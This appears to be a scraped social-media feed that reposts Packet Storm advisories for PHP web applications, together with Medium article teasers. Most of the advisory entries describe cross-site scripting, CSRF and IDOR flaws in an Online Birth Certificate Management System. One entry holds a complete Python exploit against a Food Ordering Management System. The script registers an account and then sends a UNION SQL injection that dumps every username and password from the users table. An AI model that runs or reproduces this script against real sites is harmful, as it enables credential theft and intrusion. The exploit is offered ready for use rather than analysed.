Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Birth Certificate Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.
SHA-256 |
943388058f90bc4b22c687ef0d6cbdb5a64f64c8d68d43bb23f0b86408b86d92Download
# Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
# no token in update profile admin
search recoder
search
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Birth Certificate Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Birth Certificate Management System 1.0 Cross Site Scripting
https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
SHA-256 |
7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86Download
# Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
Vulnerability Details
======================
Steps :
1) Log in to the application after register new user
Username: test
Password: 12345
2) Navigate to Birth Reg Form and Click on Add Details.
3) add full name payload =>
4) and all field enter payload only Contact Number enter number
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Birth Certificate Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Insecure Direct Object Reference
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Birth Certificate Management System 1.0 Insecure Direct Object Reference
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.
SHA-256 |
d518fb678e05f322e7641da9649d676bbd4181439b71880505b5b152205524bbDownload
# Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
Vulnerability Details
======================
Steps :
1) Log in to the application after register new user
Username: test
Password: 12345
2) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.
3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,
First Name, Phone number, and other data
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Birth Certificate Management System 1.0 Insecure Direct Object Reference
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
COVESA 2.18.8 NULL Pointer Dereference / Heap Buffer Over-Read
___________________________
@hacking_Attack
@Hacking_Video
COVESA 2.18.8 NULL Pointer Dereference / Heap Buffer Over-Read
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
COVESA 2.18.8 NULL Pointer Dereference / Heap Buffer Over-Read
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Birth Certificate Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afeDownload
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
# no token in update profile admin
CSRF update Profile
Save Change
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Birth Certificate Management System 1.0 Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Food Ordering Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Food Ordering Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
1be2c696b62c411f0a88c3819a1d4653e0f042e7aa59018ccd5596555ca02a4bDownload
# Exploit Title: Food Ordering Management System - SQL Injection
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
#/usr/bin/python3
import requests
import os
import sys
import time
import random
from bs4 import BeautifulSoup
# clean screen
os.system("cls")
os.system("clear")
logo = '''
##################################################################
# #
# SQL injection (Food Ordering Management System) #
# #
##################################################################
'''
print(logo)
url = str(input("Enter website url => "))
username = str(input("Enter Username => : "))
name = ("test123456")
password = ("test123456")
phone = ("4511233199")
number = ("1234567891000000")
cvv = ("444")
req = requests.Session()
regsiter_page = (url+"/foms/routers/register-router.php")
regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}
req_regsiter = req.post(regsiter_page,data=regsiter)
print("[+] Regsiter Successfully")
login = {'username':username,'password':password}
login_page = (url+"/foms/routers/router.php")
req_login = req.post(login_page,data=login)
print("[+] Login Successfully")
sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")
text = sql.text
soup = BeautifulSoup(text,"html.parser")
print("[+] SQL Injction Get Users and Password from table Users")
for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):
time.sleep(0.2)
print(link.get)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Food Ordering Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
How to become a hacker?
https://medium.com/@noli.mtz/how-to-become-a-hacker-be6e85672a42?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@noli.mtz/how-to-become-a-hacker-be6e85672a42?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to become a hacker?
Guys! I have more than 200 followers and it’s amazing, thank you so much to everyone! ❤ I’m back with another blog to recommend a book and…
Guys! I have more than 200 followers and it’s amazing, thank you so much to everyone! ❤ I’m back with another blog to recommend a book and…Continue reading on Medium » (https://medium.com/@noli.mtz/how-to-become-a-hacker-be6e85672a42?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to become a hacker?
Guys! I have more than 200 followers and it’s amazing, thank you so much to everyone! ❤ I’m back with another blog to recommend a book and…
Hacking on Medium
Mobile Security.
Now many Types of Hacker now active in Public Places,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Mobile Security.
Now many Types of Hacker now active in Public Places,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Mobile Security.
Now many Types of Hacker now active in Public Places,
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Creating your own Information Security Playbook
https://cdn-images-1.medium.com/max/600/1*-sjUnh0fW2ZZsgEOIjZjRw.jpeg
An In Depth Analysis of The O’Riley Read
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Creating your own Information Security Playbook
https://cdn-images-1.medium.com/max/600/1*-sjUnh0fW2ZZsgEOIjZjRw.jpeg
An In Depth Analysis of The O’Riley Read
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Creating your own Information Security Playbook
An In Depth Analysis of The O’Riley Read
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El nuevo error de 0-Day de WhatsApp permite ejecutar un código y tomar el control total de la…
https://cdn-images-1.medium.com/max/986/0*2RswmtsPfvbw9qRp
WhatsApp corrigió silenciosamente dos vulnerabilidades críticas de día cero que afectan a las versiones de Android e iOS, lo que permite a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El nuevo error de 0-Day de WhatsApp permite ejecutar un código y tomar el control total de la…
https://cdn-images-1.medium.com/max/986/0*2RswmtsPfvbw9qRp
WhatsApp corrigió silenciosamente dos vulnerabilidades críticas de día cero que afectan a las versiones de Android e iOS, lo que permite a…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El nuevo error de 0-Day de WhatsApp permite ejecutar un código y tomar el control total de la aplicación de forma remota
WhatsApp corrigió silenciosamente dos vulnerabilidades críticas de día cero que afectan a las versiones de Android e iOS, lo que permite a…